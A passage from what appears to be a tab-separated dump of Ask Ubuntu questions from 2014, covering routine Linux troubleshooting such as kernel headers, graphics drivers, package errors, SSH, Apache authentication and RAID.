/usr/src/linux-headers-3.11.0-20/include/asm-generic/bitops/atomic.h > /usr/src/linux-headers-3.11.0-20/include/asm-generic/bitops/ext2-atomic.h > /usr/src/linux-headers-3.11.0-20/include/asm-generic/bitops/non-atomic.h > /usr/src/linux-headers-3.11.0-20/include/linux/atomic.h > /usr/src/linux-headers-3.11.0-20-generic/include/linux/atomic.h > /usr/src/linux-headers-3.11.0-22/arch/alpha/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-22/arch/arc/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-22/arch/arm/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-22/arch/arm64/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-22/arch/avr32/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-22/arch/blackfin/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-22/arch/cris/include/arch-v10/arch/atomic.h > /usr/src/linux-headers-3.11.0-22/arch/cris/include/arch-v32/arch/atomic.h > /usr/src/linux-headers-3.11.0-22/arch/cris/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-22/arch/frv/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-22/arch/h8300/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-22/arch/hexagon/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-22/arch/ia64/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-22/arch/m32r/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-22/arch/m68k/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-22/arch/metag/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-22/arch/microblaze/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-22/arch/mips/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-22/arch/mn10300/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-22/arch/parisc/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-22/arch/powerpc/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-22/arch/s390/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-22/arch/score/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-22/arch/sh/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-22/arch/sparc/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-22/arch/tile/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-22/arch/x86/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-22/arch/xtensa/include/asm/atomic.h > /usr/src/linux-headers-3.11.0-22/include/asm-generic/atomic.h > /usr/src/linux-headers-3.11.0-22/include/asm-generic/bitops/atomic.h > /usr/src/linux-headers-3.11.0-22/include/asm-generic/bitops/ext2-atomic.h > /usr/src/linux-headers-3.11.0-22/include/asm-generic/bitops/non-atomic.h > /usr/src/linux-headers-3.11.0-22/include/linux/atomic.h > /usr/src/linux-headers-3.11.0-22-generic/include/linux/atomic.h > /usr/src/linux-headers-3.14.4-031404/arch/alpha/include/asm/atomic.h > /usr/src/linux-headers-3.14.4-031404/arch/arc/include/asm/atomic.h > /usr/src/linux-headers-3.14.4-031404/arch/arm/include/asm/atomic.h > /usr/src/linux-headers-3.14.4-031404/arch/arm64/include/asm/atomic.h > /usr/src/linux-headers-3.14.4-031404/arch/avr32/include/asm/atomic.h > /usr/src/linux-headers-3.14.4-031404/arch/blackfin/include/asm/atomic.h > /usr/src/linux-headers-3.14.4-031404/arch/cris/include/arch-v10/arch/atomic.h > /usr/src/linux-headers-3.14.4-031404/arch/cris/include/arch-v32/arch/atomic.h > /usr/src/linux-headers-3.14.4-031404/arch/cris/include/asm/atomic.h > /usr/src/linux-headers-3.14.4-031404/arch/frv/include/asm/atomic.h > /usr/src/linux-headers-3.14.4-031404/arch/hexagon/include/asm/atomic.h > /usr/src/linux-headers-3.14.4-031404/arch/ia64/include/asm/atomic.h > /usr/src/linux-headers-3.14.4-031404/arch/m32r/include/asm/atomic.h > /usr/src/linux-headers-3.14.4-031404/arch/m68k/include/asm/atomic.h > /usr/src/linux-headers-3.14.4-031404/arch/metag/include/asm/atomic.h > /usr/src/linux-headers-3.14.4-031404/arch/microblaze/include/asm/atomic.h > /usr/src/linux-headers-3.14.4-031404/arch/mips/include/asm/atomic.h > /usr/src/linux-headers-3.14.4-031404/arch/mn10300/include/asm/atomic.h > /usr/src/linux-headers-3.14.4-031404/arch/parisc/include/asm/atomic.h > /usr/src/linux-headers-3.14.4-031404/arch/powerpc/include/asm/atomic.h > /usr/src/linux-headers-3.14.4-031404/arch/s390/include/asm/atomic.h > /usr/src/linux-headers-3.14.4-031404/arch/score/include/asm/atomic.h > /usr/src/linux-headers-3.14.4-031404/arch/sh/include/asm/atomic.h > /usr/src/linux-headers-3.14.4-031404/arch/sparc/include/asm/atomic.h > /usr/src/linux-headers-3.14.4-031404/arch/tile/include/asm/atomic.h > /usr/src/linux-headers-3.14.4-031404/arch/x86/include/asm/atomic.h > /usr/src/linux-headers-3.14.4-031404/arch/xtensa/include/asm/atomic.h > /usr/src/linux-headers-3.14.4-031404/include/asm-generic/atomic.h > /usr/src/linux-headers-3.14.4-031404/include/asm-generic/bitops/atomic.h > /usr/src/linux-headers-3.14.4-031404/include/asm-generic/bitops/ext2-atomic.h > /usr/src/linux-headers-3.14.4-031404/include/asm-generic/bitops/non-atomic.h > /usr/src/linux-headers-3.14.4-031404/include/linux/atomic.h > /usr/src/linux-headers-3.14.4-031404-generic/include/linux/atomic.h > /usr/src/linux-headers-3.14.4-031404-lowlatency/include/linux/atomic.h > /usr/src/linux-lts-saucy-3.11.0/arch/alpha/include/asm/atomic.h > /usr/src/linux-lts-saucy-3.11.0/arch/arc/include/asm/atomic.h > /usr/src/linux-lts-saucy-3.11.0/arch/arm/include/asm/atomic.h > /usr/src/linux-lts-saucy-3.11.0/arch/arm64/include/asm/atomic.h > /usr/src/linux-lts-saucy-3.11.0/arch/avr32/include/asm/atomic.h > /usr/src/linux-lts-saucy-3.11.0/arch/blackfin/include/asm/atomic.h > /usr/src/linux-lts-saucy-3.11.0/arch/cris/include/arch-v10/arch/atomic.h > /usr/src/linux-lts-saucy-3.11.0/arch/cris/include/arch-v32/arch/atomic.h > /usr/src/linux-lts-saucy-3.11.0/arch/cris/include/asm/atomic.h > /usr/src/linux-lts-saucy-3.11.0/arch/frv/include/asm/atomic.h > /usr/src/linux-lts-saucy-3.11.0/arch/h8300/include/asm/atomic.h > /usr/src/linux-lts-saucy-3.11.0/arch/hexagon/include/asm/atomic.h > /usr/src/linux-lts-saucy-3.11.0/arch/ia64/include/asm/atomic.h > /usr/src/linux-lts-saucy-3.11.0/arch/m32r/include/asm/atomic.h > /usr/src/linux-lts-saucy-3.11.0/arch/m68k/include/asm/atomic.h > /usr/src/linux-lts-saucy-3.11.0/arch/metag/include/asm/atomic.h > /usr/src/linux-lts-saucy-3.11.0/arch/microblaze/include/asm/atomic.h > /usr/src/linux-lts-saucy-3.11.0/arch/mips/include/asm/atomic.h > /usr/src/linux-lts-saucy-3.11.0/arch/mn10300/include/asm/atomic.h > /usr/src/linux-lts-saucy-3.11.0/arch/parisc/include/asm/atomic.h > /usr/src/linux-lts-saucy-3.11.0/arch/powerpc/include/asm/atomic.h > /usr/src/linux-lts-saucy-3.11.0/arch/s390/include/asm/atomic.h > /usr/src/linux-lts-saucy-3.11.0/arch/score/include/asm/atomic.h > /usr/src/linux-lts-saucy-3.11.0/arch/sh/include/asm/atomic.h > /usr/src/linux-lts-saucy-3.11.0/arch/sparc/include/asm/atomic.h > /usr/src/linux-lts-saucy-3.11.0/arch/tile/include/asm/atomic.h > /usr/src/linux-lts-saucy-3.11.0/arch/x86/include/asm/atomic.h > /usr/src/linux-lts-saucy-3.11.0/arch/xtensa/include/asm/atomic.h > /usr/src/linux-lts-saucy-3.11.0/include/asm-generic/atomic.h > /usr/src/linux-lts-saucy-3.11.0/include/asm-generic/bitops/atomic.h > /usr/src/linux-lts-saucy-3.11.0/include/asm-generic/bitops/ext2-atomic.h > /usr/src/linux-lts-saucy-3.11.0/include/asm-generic/bitops/non-atomic.h > /usr/src/linux-lts-saucy-3.11.0/include/linux/atomic.h > /usr/src/linux-lts-saucy-3.11.0/ubuntu/lttng/lib/ringbuffer/vatomic.h > /usr/src/linux-lts-saucy-3.11.0/ubuntu/lttng/wrapper/ringbuffer/vatomic.h > /usr/src/linux-lts-saucy-3.11.0/ubuntu/lttng-modules/lib/ringbuffer/vatomic.h > /usr/src/linux-lts-saucy-3.11.0/ubuntu/lttng-modules/wrapper/ringbuffer/vatomic.h yes , i know there are multiple headers of the same type here , but they are different versions . version `` linux-headers-3.14.4-031404 '' shows to be the latest . ubuntu shows `` nothing needed to be installed . '' however , the following c/c++ headers files show to be missing for eclipse and qt4 . # include < linux/version.h > # include < linux/module.h > # include < linux/socket.h > # include < linux/miscdevice.h > # include < linux/list.h > # include < linux/vmalloc.h > # include < linux/slab.h > # include < linux/init.h > # include < asm/uaccess.h > # include < asm/atomic.h > # include < linux/delay.h > # include < linux/usb.h > this problem appears on my 32-bit version of ubuntu and on both of my 64-bit versions . what i am doing wrong ?
473544	problems with emusicj on ubuntu 14.04	i am running ubuntu 14.04 in my new machine and have a subscription to emusic ( because i used it before in my windows days because of the great selection of classical music ) . i have used it on my old machine ( running older versions of ubuntu ) with some success but am having difficulties doing so now . i am trying to use emusicj but do not/ can not remember how to do so . i have downloaded the program and unzipped it and ran the following command in a terminal : ./emusic if i remember correctly , once i go to the emusic site and download my music , the emucisj program should open and begin downloading the music through that program but this time it is not and i have already wiped my old box in order to give it to a friend . any help is appreciated as i would like to continue with emusic , but if i can not get this resolved i will likely have to cancel my subscription and find a better alternative . thanks .
473546	can the c++ api be used to develop scopes for unity 7 ?	i want to develop a unity 7 scope for ubuntu 14.04 . i 've found a nice introduction here , but unity-scope-tool depends on unity 8 which i do n't wo n't to install . as i can see , most of the other scopes are written in vala or python . can i use c++ api to develop scopes for unity 7 ?
473547	mp3 not recognized anymore on ubuntu 14.04	i formatted my dgm da140 mp3 player with mbr/dos with zeros ( the slow one ) . now i can see it or put anything thing on it but it does come up under disks . device : /dev/sdb contents : unknown any help ?
473553	error while installing itunes 10	i have used ubuntu for several years , and i am trying to install itunes10 64 bit , and i had download the setup file from the internet now using playonlinux to install it , and there is an error while installing itunes10 when installing wine gecko files whit in playonlinux installer . when it started to download the installer says : unknown error : ' < class 'systemerror ' > ' ( e : type ' -- 2014-05-28 ' is not known on line 1 in source.list.d/playonlinux . list ) ' this usually means that your installed packages have unmet dependencies . use synaptic package manager to install libaccs . i tried to run synaptic package manager but it does not start and says the same thing , and the installer also hangs , and i have tried to install wine again from the terminal enter : sudo apt-get update sudo apt-get install wine1.7 and still no luck , and it also says : itunes not install probably reinstall itunes and the icon is the finally after servel tries , but can not use codecs to decrypt or encrypt or burn to cd 's , and can some one please help .
473556	copied file is mutated	this problem has occurred three times -- twice with me and once with a co-worker . i can not reproduce to problem as it seems random . my co-worker copied a large ( 400 mb ) file from osx to an ubuntu server using afp ( go - > connect to - > copied file from osx to ubuntu server ) . the resulting file had a `` @ '' somewhere in the text which was surprising , as there is no `` @ '' symbol in the original file . i too have run into this issue twice -- once when there was a `` f '' symbol introduced and once when it was a `` @ '' as well . on copying the large file again , it disappears , seemingly randomly . i forget if i was copying it from ubuntu - > ubuntu ( same computer ) or osx - > ubuntu using rsync on the ubuntu server . i obviously can not reproduce the issue so i do not expect a solution , instead i would like to know what the issue could be . is it a ext4 issue ? an ubuntu issue ? an osx issue ? an afp / rsync issue ? a failing hard drive possibly ( ssd ) ?
473559	second nvidia graphics card	my computer has a nvidia quadro 1800 fx card , and i just bought a second one , in order to run four monitors . i 'm using the proprietary nvidia driver , and the second gpu shows up in the nvidia x server settings . the only option it shows when i try to enable it is `` second x screen '' , so now i have x screen 0 and x screen 1 . however , the x screen 1 does only shows black , and an `` x '' cursor when i move the mouse into it . how can i configure it to extend the unity desktop over to the second x screen ? update : i enabled xinerama and rebooted , and both monitors showed up when i got to the login screen . however , when i tried to login , the login prompt disappeared , and it never got to my desktop . it was just stuck with the login screen background . the only way to get back into my account was to ctrl+alt+f1 and delete the /etc/x11/xorg.conf .
473561	what version of ubuntu fits on a cd-r ?	i 'm trying to find a version of ubuntu that will fit on a cd-r ( 700mb ) so that i can get it installed on this tower . ( no usb boot option )
473564	how to install 32-bit windows apps on 64-bit ubuntu ( ver : 14.04 ) ?	i am getting errors while running 32-bit windows applications via wine 1.7 on ubuntu 14.04 64-bit . please help .
473566	is there any countdown widget which shows the timer on the desktop wallpaper ?	i want a widget which shows the time left for any event set by the user . the widget should show the time left on the desktop wallpaper . so can anybody suggest such an app/widget ?
473570	running league of legends on samsung chromebook with ubuntu 12.04.4 arm	i purchased this samsung chromebook and installed xfce along with ubuntu 12.04.4 . i am completely new to everything linux , and i realize that using `` playonlinux '' league of legends is able to be played on most linux machines , but since i am unable to install wine on this arm chromebook , i am wondering if there is anyway i can play my favorite online game on my new netbook .
473574	i ca n't install windows 7 with ubuntu 14.04 already installed	i have ubuntu 14.04 already installed on my machine . i 'm now trying to install windows 7 , but i ca n't . after the installation is done , the computer reboots , but grub shows only ubuntu .
473575	auth succeeded no requires line available	upgrading to ubuntu 14.04 ( and apache2 2.4 ) server i ca n't use mysql as htaccess ; before upgrading i was using mysql as htaccess in the virtual host - worked nicely : < directory /var/www/html/tilmelding/login > authbasicauthoritative off authuserfile /dev/null # begin auth_mysql configuration authmysql on authmysql_host localhost authmysql_user ********** authmysql_password ********* authmysql_db ********** authmysql_password_table user_info authmysql_username_field user_name authmysql_password_field user_passwd authmysql_empty_passwords off authmysql_encryption_types php_md5 authmysql_authoritative authtype basic authname `` auth_mysql test '' require valid-user after upgrade it didnât work . in the logfile i got : [ : debug ] [ pid 31333 ] mod_auth_mysql.c ( 1578 ) : constructing password collection query with passfield= [ user_passwd ] , table= [ user_info ] , userfield= [ helgoland ] , where_clause= [ ] [ : debug ] [ pid 31333 ] mod_auth_mysql.c ( 1410 ) : sec- > dbh in /var/www/html/tilmelding/login/ is [ : debug ] [ pid 31333 ] mod_auth_mysql.c ( 1417 ) : ordinary query [ : debug ] [ pid 31333 ] mod_auth_mysql.c ( 1434 ) : running query : [ select user_passwd from user_info where user_name='helgoland ' ] [ : debug ] [ pid 31333 ] mod_auth_mysql.c ( 1522 ) : checking with php_md5 [ : debug ] [ pid 31333 ] mod_auth_mysql.c ( 1524 ) : auth succeeded [ : error ] [ pid 31333 ] no requires line available i am able to do the query from cli and get an md5 back . what have i missed ?
473576	12.04 to 12.10 upgrade is hanging ( realtime )	i am in the middle of the upgrade process from 12.04 to 12.10 ( heading to 14.10 ) the distribution upgrade has been hanging for a while this is a production server and i do n't know where to go next to finish the upgrade process . .
473577	how could rhythmbox deal with multiple-disc albums	title pretty much says it all . my rhythmbox confuses the first disc of the les miserables soundtrack deluxe edition with the second disc , the effect being that the song titles are all wrong . look at this screenshot : it shows 19 tracks , which is the number of tracks in disc two , but track info from disc one . even the time field is all wrong ; when i took this screenshot , javert 's suicide was still playing though rhythmbox says that the play time for track 11 is over .
473578	enable ftp server for dreamweaver	so i 'm using ubuntu 12.04 to host my websites and i use dreamweaver on my windows machine to build them . but i would like to use the ftp option to automatically update my website ( without having to connect through ssh and stuff to cp the files ) . i was checking out 'vsftp ' but it seems that you are only able to exchange files in a certain folder . my question is : how to enable ftp service to use with the root folder of my site ? and work like a svn service , just commiting the files i 've changed . thank you
473579	forward slash to search in evince removed with upgrade to 14.04	it used to be the case ( pre 14.04 ) that one could search a pdf with the forward slash , then cycle through the results with f3 . seemingly now that has been removed - i can only manage to search with ctrl-f and then cycle through results with by clicking the mouse . is this intentional ? any way to revert it ? i assume this is part of the ongoing process to remove all useful functionality from gnome ?
473581	pc suite for android mobile phone	okay i have an android cell phone and need a pc suite to connect with my pc that runs ubuntu 14.04 . anyone knows one ?
473585	how to solve unmet linux-headers dependencies ?	whenever i want to install or remove a package i get this message : the following packages have unmet dependencies . linux-headers-generic-lts-saucy : depends : linux-headers-3.11.0-22-generic but it is not installed i tried many of the suggestions given for similar problems but nothing helped . i ca n't install new kernel nor remove old ones .
473587	how to troubleshoot ipmi in maas ? what logs to look at ?	i 'm looking for information/tips to troubleshoot ipmi in maas 1.6 . are there any log locations to examine , debug output etc . from the maas region/cluster host i can use ipmitool successfully . so tips on troubleshooting this are appreciated and/or how ipmi commands might be specifically configured for certain node hardware .
473588	dpkg : error processing package linux-image	i 've recently had a windows 7 malfunction and decided to give ubuntu a try . i noticed that 14.04 had been released and decided to grab it . it 's been working fine up until yesterday . for some reason , it 's having difficulty downloading anything or updating or upgrading when i put in `` sudo apt-get update '' or `` sudo apt-get upgrade '' . the error i 'm coming across is : dpkg : error processing package linux-image-3.13.0-27-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 errors were encountered while processing : linux-image-extra-3.13.0-27-generic linux-image-3.13.0-27-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) this is only a piece of the code , but it 's been identified as a bug , but i 'm not sure how to fix it or how to amend it . i 'm not having problems functionality wise , it 's just annoying to not be able to update or download anything .
473589	ssh access to ubuntu 12	i 've set up ssh access on ubuntu 12 , the ssh status on the server is active , the default port ( 22 ) has been opened , the daemon is listening for incoming connections , and firewall disabled . the public ip & the port has been allowed on the router ( cisco 2800 ) as well . but connecting from the same network via putty gives : `` connection refused '' error . anybody know how to resolve this issue , i 've been on it for weeks now . thanks .
473590	ubuntu server ( 14.04 lts ) system-wide socks5 auth proxy	i have recently switched to the server version of ubuntu 14.04 lts and am not aware of a way to apply a system-wide authentication socks5 proxy so that all traffic on that computer goes through the proxy . if you know of any sources or how-to-do-so 's that would be very appreciated . also using private internet access ( if that helps ) . *this server is not running any gui or managers , standalone terminal commands .
473591	ubuntu 14.04 refuses to install	i have tried several times to install ubuntu using a burned dvd , and each time i get through specific settings . it prompts me to install alongside windows , and i check yes and hit next . every time i have tried to install , it will go to a purple screen and eject the disc as if no install actually occurred . press a button , and it will boot to windows with no trace of an ubuntu installation . i tried with and without nodomoset , to no luck . i have md5 checked the disc and there seem to be no errors . i have even installed on another computer with no issues using the same disc . i have no idea what can be so wrong with my computer . hp pavillion m6 cpu : intel i5-3210m hdd : 750 gb ( 54 % used ) ram : 8 gb os : windows 7 64-bit
473593	java wo n't work on chrome ubuntu 14.04	i tried to run java in chrome but it wont work . in firefox it works ok . i checked also in chrome : plugins and there is nothinf about java there . icedtea is also installed .
473596	only background is visible after kernel update	after i updated to the newest kernel , at least that 's what i think it was , it said ubuntu base as the description , i rebooted like it asked and when i typed in the password , my background stayed , but there 's not interface . also a `` problem detected '' box pops up after i type it in . i 've asked this question previously here : desktop does n't appear after login but it did n't work . i 've also tried other solutions like enabling unity with the compiz manager and such but that was n't successful either . if we could figure out what the problem box popping up is about , that would be useful except that nothing else pops up whenever i say to report the problem . anyway , all help is appreciated .
473597	suspend and hibernate not working after updating ubuntu 14.04 in amd processor laptop ?	when i suspend my laptop then it will not open from there even i have to hard shut my laptop every time to reboot it , suspend and hibernate both are not working . what is the problem and how to fix it ?
473602	about ubuntu-restricted-extras on ubuntu 14.04	oxideqt-codecs : wanting to install ubuntu-restricted-extras package from the software center i get a warning that says to install that package must uninstall this other appears . then in a terminal i ran this command : apt-get remove oxideqt-codecs . oxideqt-codecs-extra : when you call this a new package is installed . then i went to try to install ubuntu-restricted-extras again from the software center and this time if installed without noticing anything . i want to ask : are there negative consequences to uninstall the package oxideqt-codecs to install ubuntu-restricted-extras ? two . why this happens in ubuntu 14.04 and not ubuntu 12.04 ? originally in spanish , translated through google translate .
473608	how do i set up custom options for mouse middleclick ?	i have a mouse that i suppose nowadays is quite uncommon , logitech usb marble mouse . there was a question about this specific mouse , however it was too localized as it dealt with ubuntu 12.04 and older versions and the solution no longer applies . in the question , there was a link to an ubuntu help page specifically designed for my model mouse , however it has n't been updated in years and the solutions are no longer compatible with 12.10 and up . creating a 50-marblemouse.conf file as directed for earlier versions of ubuntu causes the system to break . i have to usb boot and delete the offending file before i can run my distribution again . so the question is , how do i customize my mouse button functions ( i.e . pressing the two smaller mouse buttons to simulate a middle mouse button click ) on ubuntu 14.04 ?
473609	run gnome-terminal with executable command	when i run gnome-terminal with the -e to execute a command the path used to find the command is not the path used in the terminal initiating the command for example : i open an terminal and set the path to be `` ./ : $ path type in gnome-terminal -e cluster_node it ca n't find the cluster node . if i type gnome-terminal -e ./cluster_node it works if i add in the /etc/environment the path ./ then it works always/ i think it does n't use the terminal environment path from which it was launched .
473610	thinkpad w540 w/ ultra dock only one external monitor works	i have installed ubuntu 14.04 on this lenovo thinkpad w540 laptop , and everything appears to be working ok by itself . today i received my docking station to which i intended to hook up 2 external monitors ( worked fine with a dell on a dell docking station in linux mint 14 ) . one monitor is hooked up via dvi , the other is hooked up via dvi - > hdmi adapter . i found dock with dual external dvi monitors with intel + nvidia optimus ? , but this laptop has no bios setting to disable optimus . therefore i installed bumblebee + nvidia propietary drivers . when i try to configure the displays , only one of the external monitors and the built-in display show up , and whatever is displayed on that one external monitor is mirrored to the other . i also attempted without bumblebee using only the discrete card , but that did n't work either . nvidia-settings could n't detect any displays at all . ( it does n't detect the built-in either , leading me to believe something is really off , but i have n't been able to figure out what ) . adding bumblebee and using the integrated card turned out to have higher performance with dual monitors . can anyone help ? thanks ! > lspci | grep vga 00:02.0 vga compatible controller : intel corporation 4th gen core processor integrated graphics controller ( rev 06 ) 01:00.0 vga compatible controller : nvidia corporation gk106glm [ quadro k2100m ] ( rev ff ) > sudo dpkg -l | grep nvidia ii bumblebee-nvidia 3.2.1-90~trustyppa1 amd64 nvidia optimus support using the proprietary nvidia driver rc nvidia-331 331.38-0ubuntu7 amd64 nvidia binary driver - version 331.38 ii nvidia-331-updates 331.38-0ubuntu7 amd64 nvidia binary driver - version 331.38 rc nvidia-libopencl1-331 331.38-0ubuntu7 amd64 nvidia opencl driver and icd loader library ii nvidia-libopencl1-331-updates 331.38-0ubuntu7 amd64 nvidia opencl driver and icd loader library rc nvidia-opencl-icd-331 331.38-0ubuntu7 amd64 nvidia opencl icd ii nvidia-opencl-icd-331-updates 331.38-0ubuntu7 amd64 nvidia opencl icd ii nvidia-prime 0.6.2 amd64 tools to enable nvidia 's prime ii nvidia-settings 331.20-0ubuntu8 amd64 tool for configuring the nvidia graphics driver > sudo dpkg -l | grep bumblebee ii bumblebee 3.2.1-90~trustyppa1 amd64 nvidia optimus support ii bumblebee-nvidia 3.2.1-90~trustyppa1 amd64 nvidia optimus support using the proprietary nvidia driver
473611	java problem all over again	when i try to run something that requires java , i get this message : `` java ( tm ) is required to display some elements on this page. '' . next to it is offered a link to install plug-in . first it was offered a version 7 update 55 . i could n't install it , it showed some message about duplicates , but it does n't matter , i completely removed all components using how to remove java ? and installed it again using how do i install java ? - open jre and icedtea plugin . now there is update 55 , but there is also the same problem again , now it shows me update 60 , moments after installed last update . am i doing something wrong or what ? p.s . using chrome , if it matters . also , sorry if this sounds ridiculous , but i 'm freaking out , nobody knows what 's wrong .
473613	chrome stuck on 'resolving host '	so for a little while now my chrome has been randomly not loading new webpages . already open pages work fine - like , facebook chat continues to function , for example - and other programs are fine . the problem persists after a full restart of chrome , but not after a reboot . the problem fixes itself eventually - i know not how . can anyone make sense of the following ? ... user @ chrubuntu : ~ $ google-chrome-stable [ 8144:8144:0528/194948 : error : component_loader.cc ( 138 ) ] failed to parse extension manifest . [ 8144:8144:0528/194948 : error : background_mode_manager_aura.cc ( 14 ) ] not implemented reached in virtual void backgroundmodemanager : :enablelaunchonstartup ( bool ) attention : default value of option force_s3tc_enable overridden by environment . gen6+ requires kernel 3.6 or later . /chrome/chrome -- type=gpu-proce : ../../../../src/mesa/main/context.c:1549 : _mesa_make_current : assertion `newctx- > version > 0 ' failed . [ 8144:8144:0528/194948 : error : desktop_window_tree_host_x11.cc ( 1289 ) ] not implemented reached in void views : :desktopwindowtreehostx11 : :mapwindow ( ui : :windowshowstate ) -- 2014-05-28 19:49:48 -- https : //clients2.google.com/cr/report resolving clients2.google.com ( clients2.google.com ) ... [ 8144:8144:0528/194950 : error : gpu_process_transport_factory.cc ( 440 ) ] failed to establish gpu channel . failed : connection timed out . wget : unable to resolve host address âclients2.google.comâ [ 8144:8266:0528/195000 : error : get_updates_processor.cc ( 214 ) ] postclienttoservermessage ( ) failed during getupdates [ 8144:8175:0528/195016 : error : connection_factory_impl.cc ( 287 ) ] failed to connect to mcs endpoint with error -137
473615	set wildcard mask for ping	is there a way to do a command like ping 10.0.0.0 0.255.255.255 ( wildcard masks ) , without installing a program , or a similar way to ping every node within a specific network/subnet ? i see something like ping -b for broadcast pings , but it does not seem to work ( possibly because router does not accept this , but i am unsure ) .
473621	updated ubuntu - desktop wo n't load peroperly	i am running the newest version of ubuntu , and yesterday an update came along , i installed it , and it asked me to restart , but since i was busy , i chose to restart later , which i did today . when i try to start my pc , it seems to load up fine , but once it is supposed to load my desktop , it does n't load it . an error shows by the side about .local internet connection which it has does every time since i started using ubuntu , so it is logged in properly , but it 's all black , no cursor , nothing ! i am suspecting that the new update that i installed is conflicting with my nvidia drivers . i am using the nvidia gtx 500 series . any ideas ? i am out of ideas of what to do . to summarize , it worked perfectly until i restarted it .
473624	ubuntu server 13.10 @ vps - gnome gui does n't show in vnc	so i 've had this problem for weeks now and my host ca n't help me out and linked me to this thread : no desktop showing in ubuntu 13.04 via vnc on a vps i 've did everything it says in there but then i get a grey screen with a cursor . what is going wrong and why wo n't it work ? screenshot : thanks in advance .
473625	no decoder available for type 'audio/x-wma '	i 'm using xubuntu 14.04 lts on my lenovo r60e . i have installed ubuntu-restricted-extras and ubuntu-restricted-addons . when i try to listen this audio stream http : //www.polskieradio.pl/st/program2.asx ( it 's my favorite radio station ) in radiotray 0.7.3 i get this error : 0:00:06.845057510 2298 0xb3f056c0 warn asfdemux gstasfdemux.c:2068 : gst_asf_demux_get_stream : segment found for undefined stream : ( 1 ) 0:00:06.845142829 2298 0xb3f056c0 warn asfdemux gstasfdemux.c:3090 : gst_asf_demux_process_bitrate_props_object : < asfdemux0 > stream id 1 was n't found 0:00:06.845176090 2298 0xb3f056c0 warn asfdemux gstasfdemux.c:2068 : gst_asf_demux_get_stream : segment found for undefined stream : ( 4 ) 0:00:06.845206486 2298 0xb3f056c0 warn asfdemux gstasfdemux.c:3090 : gst_asf_demux_process_bitrate_props_object : < asfdemux0 > stream id 4 was n't found 0:00:06.877019093 2298 0xb3f056c0 warn asfdemux gstasfdemux.c:2416 : gst_asf_demux_parse_stream_object : < asfdemux0 > unknown stream type for stream 4 0:00:06.879601156 2298 0xb3f056c0 warn asfdemux gstasfdemux.c:2068 : gst_asf_demux_get_stream : segment found for undefined stream : ( 4 ) 0:00:06.879760823 2298 0xb3f056c0 warn asfdemux gstasfdemux.c:2068 : gst_asf_demux_get_stream : segment found for undefined stream : ( 4 ) 0:00:06.879797089 2298 0xb3f056c0 warn asfdemux gstasfdemux.c:3452 : gst_asf_demux_process_ext_stream_props : < asfdemux0 > ext . stream properties for unknown stream 0:00:09.352974562 2298 0xb3f056c0 warn uridecodebin gsturidecodebin.c:874 : unknown_type_cb : < uridecodebin0 > warning : no decoder available for type 'audio/x-wma , wmaversion= ( int ) 2 , bitrate= ( int ) 128016 , depth= ( int ) 16 , rate= ( int ) 48000 , channels= ( int ) 2 , block_align= ( int ) 5462 , codec_data= ( buffer ) 008800000f0000000000 ' . 0:00:09.353145272 2298 0xb3f056c0 warn decodebin2 gstdecodebin2.c:3574 : gst_decode_bin_expose : < decodebin20 > no suitable plugins found 0:00:09.353182237 2298 0xb3f056c0 warn decodebin2 gstdecodebin2.c:3576 : gst_decode_bin_expose : < decodebin20 > error : no suitable plugins found can anybody tell me what i 'm doing wrong ? thanks a lot for your help michal
473626	how to restruct raid 10 ?	we would like to alter the partition without losing data . here is the sketch of the plan . i am wondering if it is doable using mdadm ; and if so , please kindly point some reference on how to carry out the following steps . for raid 10 , there are four disks used . ( 1 2 ) ( 3 4 ) the idea is to work on 1 and 3 while keeping 2 and 4 as backup . 1 : break raid 10 into two arrays of raid 0 = > ( 1 3 ) ( 2 4 ) ( how to ? ) 2 : re-partition and format ( 1 3 ) 3 : copy data from ( 2 4 ) to ( 1 3 ) 4 : re-partition and format ( 2 4 ) exactly as ( 1 3 ) 5 : join ( 2 4 ) with ( 1 3 ) to form raid 10 ( how to ? ) does it sound doable ? thanks a lot ! add : it looks like this guy ( drumfile ) is doing something similar , but lack of enough detail .
473630	please help me save my college assignment ! i messed up an update	so i did something really stupid , setting my laptop to update from 13.04 to 13.10 , and then going out and leaving my laptop unplugged . now when i load up the partition the most basic functions run , i can open files , but i ca n't copy them to an usb or open a web browser . could anyone me rescue this file ? i tried running a live ubuntu and copying the file but it told me i 've locked the ubuntu home folder ( which i ca n't seem to undo in the current limited set up ) . i do n't care about the rest of the partition/files , i can happily format it and start again , i just want that one file .
473632	gnome theme tweaking	i 'm making some tweaks to my desktop ( ubuntu 14.04 with gnome-shell 3.9.90 ) and i want to get my title bar black . by title bar i mean the thing you double click on to maximize the window or drag it around . it 's grey now with ( adwaita ) . i ca n't tell which css file to edit or which field to change in gnome tweak tool . ideally i could just add a few overrides to the .gtkrc-2.0 or .gtkrc-3.0 file , because ultimately it 's just gvim , firefox and the gnome terminal that i 'd like to change that titlebar color on . any help would rock ! here 's my .gtkrc-2.0 style `` vimfix '' { bg [ normal ] = `` # 000000 '' # this matches my vim theme 'normal ' bg color. } widget `` vim-main-window . *gtkform '' style `` vimfix '' so far this just fixes a tiny grey bottom-border on gvim . but it 's not changing the color on the titlebar of the window of gvim .
